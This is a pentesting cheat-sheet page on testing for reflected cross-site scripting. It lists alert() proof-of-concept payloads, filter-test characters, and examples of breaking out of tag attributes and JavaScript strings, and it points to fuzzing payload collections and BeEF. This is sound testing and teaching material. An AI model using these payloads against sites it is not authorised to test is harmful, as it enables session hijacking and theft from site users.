XSS

Test if you have reflected cross site scripting with:

<script>alert(42);</script>

Or simply for HTML injection (especially for <script> filtering bypass)

<img src='aaa' onerror=alert(1)>
<svg onload=alert(42)>

Encode important or all characters!

XSS PoC Payloads

Collections of XSS payloads ready for fuzzing already exist:

Fuzzdb: XSS payloads under /opt/fuzzdb/attack-payloads/xss
JBroFuzz: Part of ZAP’s fuzzer /opt/jbrofuzz/
Burp: Pro expands on payloads provided in Burp Free
ZAP: Simply a collection of JBroFuzz and some fuzzdb
XSSer: Includes a “valid payload vectors” list specific to XSS

XSS Discovery

Fuzzing

• Reflection tests: Simple but unique strings to determine if input is
reflected back: 42424242

• Filter tests: Determine what characters get filtered or encoded:
<>()='"/;[]{}$--#&//

• PoC payloads: These payloads attempt to prove the XSS flaw exists:
<script>alert(42);</script>

In Tag Attributes

Input: 424242
Initial HTML:
<input type="text" name="xss" value="424242">

Context Considerations:
• Prefix option to close value assignment and possibly close the tag ">
• Suffix depends on whether additional tags injected

Example Payload – Event Injection:
424242" onload="alert(42)

Resultant HTML:
<input type="text" name="xss" value="424242" onload="alert(42)">

In Existing JS Code

Input: 424242
Initial HTML:
<script>var HitchHiker="424242"; … </script>

Context Considerations:
• Suffix options include JS line terminator, ; ,and single line comment delimiter, //
• Often will be within a JS function, so closing parenthesis, ), might also be needed

Example Payload:
42";alert(42);//

Resultant HTML:
<script>var HitchHiker="42";alert(42);//"; … </script>

Beef

use to expand upon XSS besides proving it exists.

PreviousBlind Data Exfiltration via DNS NextXXE

Last updated 5 months ago